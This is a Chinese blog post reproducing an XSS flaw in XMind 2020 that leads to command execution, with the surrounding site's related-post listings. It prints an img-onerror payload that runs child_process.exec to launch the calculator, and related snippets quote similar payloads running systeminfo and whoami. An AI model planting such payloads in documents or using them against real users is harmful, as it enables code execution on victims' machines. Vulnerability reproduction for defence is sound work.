xmind2020xss漏洞复现

最新推荐文章于 2024-02-20 11:06:07 发布
最新推荐文章于 2024-02-20 11:06:07 发布
阅读量513 收藏
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46171781/article/details/116611392
版权

今天看到某数字漏洞平台公布的xmind漏洞,尝试复现一下

一、复现环境

使用软件为xmind2020版本,可以在xmind官网(https://www.xmind.cn/)进行下载
版本

二、复现过程

1.创建一个思维导图,内容中写入payload
创建内容

2.进入大纲选项,选中内容按功能键,如shift、ctrl、alt、win键

实现1
3.进一步利用漏洞进行命令执行(payload来自于https://mp.weixin.qq.com/s/NjrycY4TxEz_vV83prNBzw),成功弹出计算器。payload如下:

<img src=x onerror="const exec = require('child_process').exec;exec('calc').stdout.on('data', function (data) {alert(data);})">

实现2

三、防范方面

1.及时更新软件版本
2.不要随便打开来源不明的思维导图

白芷th
关注
专栏目录
Xmind2020存在XSS导致命令执行漏洞复现
m0_48520508的博客
05-19 511
0x00介绍 XMind 是一款非常实用的商业思维导图软件,应用全球最先进的Eclipse RCP 软件架构,全力打造易用、高效的可视化思维软件,强调软件的可扩展、跨平台、稳定性和性能,致力于使用先进的软件技术帮助用户真正意义上提高生产率。 0x01漏洞概述 该漏洞可以花样构造相关参数,执行系统命令,获取用户权限,攻击者可以借助该漏洞实现命令执行,在实际环境中借助钓鱼攻击可能造成更严重的危害 0x02影响版本 Xmind 2020 0x03环境搭建 1、下载漏洞环境,使用软件为xmind2020版本,可自.
XMind漏洞xss复现(最全payload图文教程)
weixin_51387754的博客
05-18 408
https://mp.weixin.qq.com/s/gunmk1ox62sg2ifmVLFy7A
XMind 2020 XSS漏洞复现
遇事不决冲冲冲
05-25 2257
一.前言 漏洞危害:可以花样构造相关参数,执行系统命令,获取用户权限,攻击者可以借助该漏洞实现命令执行,在实际环境中借助钓鱼攻击可能造成更严重的危害,我看网上相关复现文章都贴着这句话,其实也就是这样的,XMind xss漏洞的确可以被利用执行一些像弹窗,执行命令(经典ipconfig命令,弹计算器),以及配合cs的使用,如果真的有有心人去利用这个漏洞的话,也是很容易中招的。下面放上下载地址。 下载地址下载XMind 2020版本 二.漏洞利用 1.xss弹窗 创建 写入命令 在思维导图红色部分(不止红
XMind 2020/2021 beat版本xss漏洞复现
yangbz123的博客
05-12 611
XMind概述 XMind 是一款非常实用的商业思维导图软件,应用全球最先进的Eclipse RCP 软件架构,全力打造易用、高效的可视化思维软件,强调软件的可扩展、跨平台、稳定性和性能,致力于使用先进的软件技术帮助用户真正意义上提高生产率。 漏洞利用 ##证明xss payload <img src=x onerror=alert(/hack/)> ##代码执行payload require('child_process').exec('systeminfo',(error, stdout,
Xmind 2020 XSS漏洞导致命令执行漏洞复现
Jaky5320的博客
05-10 304
0x00简介:       XMind是一个挺不错的思维导图软件,某数字漏洞云公众号在今天2021-05-10 10:22:29发布了漏洞预警信息,我立马找复现环境。下载地址:https://www.xmind.cn/0x01:复现:环境:1、XSS复现2、命令执行漏洞复现:0x02:预防:       1、升级到最新版本    2、谨慎打开Xmind &nb
xmind漏洞
qq_23690313的博客
12-14 2675
XMind 目录 一、 项目概要 1 二、 测试过程 1 (一) 制定实施方案: 1 (二) 风险规避: 1 (三) 测试过程: 2 (四) 整改加固建议: 4 三、 渗透测试方法 5 (一) RCE漏洞 5 (二) Cobalt Strike 5 四、 渗透测试范围 6 一、项目概要 (一)项目背景:2021年5月10日,360漏洞云监测到Xmind 2020存在XSS漏洞,攻击者可以借助该漏洞实现命令执行,在实际环境中借助钓鱼攻击可能造成更严重的危害。 (二)实验目标:主要通过渗透测试的方式,发现和总结
XMind 2020 xss漏洞导致远程代码执行
jelly
05-14 500
0x00 简介 2021年5月10日,360漏洞云监测到Xmind 2020存在XSS漏洞,攻击者可以借助该漏洞实现命令执行,在实际环境中借助钓鱼攻击可能造成更严重的危害。 影响版本: XMind 2020/2021 beat版本 0x01 复现环境 系统:普通的 win10 XMind 版本:XMind-2021-for-Windows-64bit-11.0.0-Beta1-202105061920 此外还测试了 XMind 2020 windows和macOS 版本均存在该漏洞复现记录时间:2021
Electron审计入门知识铺垫
jelly
06-24 1226
前言 最近被 XMind 2020 XSS 导致远程代码执行的漏洞所吸引,复现过程比较简单,于是想研究一下漏洞造成的原因,因为 XMind 属于 electorn 应用,应用了很多 Web 前端技术,然后就发现自己什么也看不懂。所以后面收集了很多知识,构成了这篇文章,相信看完这篇文章后,大家会对 electorn 审计会有大概的思路。 Electron的安全策略 nodeIntegration nodeIntegration 是用来隔离不受信任的资源,如来自不受信任的远程服务器的代码在本地被执行,将会造成安
[代码审计]青云客Cms前台有条件注入至getshell,后台xss至getshell、至弹你一脸计算器...
weixin_30791095的博客
12-15 266
之前写了一篇关于青云客cms的文章,发在了t00ls,就不copy过来了。 给个链接,好记录一下。 https://www.t00ls.net/thread-43093-1-1.html 转载于:https://www.cnblogs.com/r00tuser/p/8044025.html...
基础漏洞系列(二)——XSS
柠檬木有枝
01-13 316
https://github.com/jlkl/Basic_vulnerability/blob/master/XSS%E8%84%91%E5%9B%BE_19_8.mindmap.xmind
两步解决XMind打不开的问题
热门推荐
李英俊小朋友
12-21 2万+
两步解决XMind打不开的问题 写在前面 做这件事的原因: 对XMind进行神秘处理之后,发现XMind就打不开了 然后我研究了半天,发现在XMind.ini中把-javaagent:D:\XMind\XMindCrack.jar这行删掉就没问题 如果有错别字呢,哪里写错了呢,请在评论区告诉我嗷,同时,可能会有一些奇奇怪怪的符号夹在文字中,这是因为我用的是MarkDown语法,其中一些符号可能在这个平台(比如CSDN)不支持呢。 解决方案 把你的XMindCrack.jar放到安装目录下,我是
漏洞复现】Exrick-XMall-开源商城-SQL注入漏洞
最新发布
知黑而守白
02-20 102
XMail是一个基于SOA架构的分布式电商购物商城,前后端分离。该系统/item/list、/item/listSearch、/sys/log、/order/list、/member/list、/member/list/remove等多处接口存在SQL注入漏洞,会造成数据泄露。
xmind怎么在父主题和子主题之间再插入一级主题
jackyrongvip的专栏
11-27 1万+
开始不知道如何搞,查了下,原来办法是: 选中全部二级子主题,点击鼠标右键,选父主题,即可在父主题与二级子主题之间添加一级子主题
CSDN用户数据库泄露事件给我们的启示
suoyihen
12-24 686
知道CSDN用户数据库泄露这件事情是在12月21日晚上八九点的时候,那时候正在整理第二天报告要用到的思维导图,大奎告诉我说CSDN的用户密码都被泄露了,刚开始还不相信,不过当我从网上下载CSDN数据库文件,并看到自己的账户和密码时,我信了,并且心惊了一下,本来想着对自己的密码立刻进行修改,但网站采取了紧急措施,关闭了相应的功能,或许是为了防止别人恶意修改吧. 此次事件在互联网上引起了...
XMind思维导图添加子标题方法
weixin_34202952的博客
07-08 1271
2019独角兽企业重金招聘Python工程师标准>>> ...
XMind-XSS-V8内核命令执行复现
Adminxe的博客
05-11 239
0x00 前言 测试环境: XMind 202005082128 0x01 payload(需要在大纲板块进行触发) <img src=x onerror="const exec = require('child_process').exec;exec('whoami').stdout.on('data', function (data) {alert(data);})"> 0x02 触发键 shift control option command 0x03 漏..
XSS是什么?(Xmind配文详解)
weixin_55832111的博客
03-27 1万+
一张图带你详解XSS (话不多说上图) 一、什么是 XSS XSS全称(Cross Site Scripting)跨站脚本攻击,是最常见的Web应用程序安全漏洞之一,位于OWASP top 10 2013/2017年度分别为第三名和第七名,XSS是指攻击者在网页中嵌入客户端脚本,通常是JavaScript编写的危险代码,当用户使用浏览器浏览网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的。 (是不是有人就会有疑问了,缩写不应该是CSS吗?因为CSS(层叠样式表)是一种用来表现文件样式的计算机
xmind打不开的问题
scarlette唐从入门到放弃
01-31 5826
xmind突然打不开了,参考网上解决方案可以解决 (1)找到xmind的安装位置 (2)用记事本打开“XMind.ini”和“XMind-original.ini”。 (3)将两个文件的Application Data改为“AppData/Roaming” (4)如果还打不开,重启电脑即可 充分了解了win系统的绝招就是重启啊,ubuntu就不能随便搞重启 ...
xmind2020安装目录
09-16
XMind 2020的安装目录是用户选择安装XMind 2020时所指定的目录。在安装XMind 2020之前,用户需要下载安装程序,并运行该程序。运行程序后,用户将看到一个安装向导,该向导将引导用户完成XMind 2020的安装过程。 在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值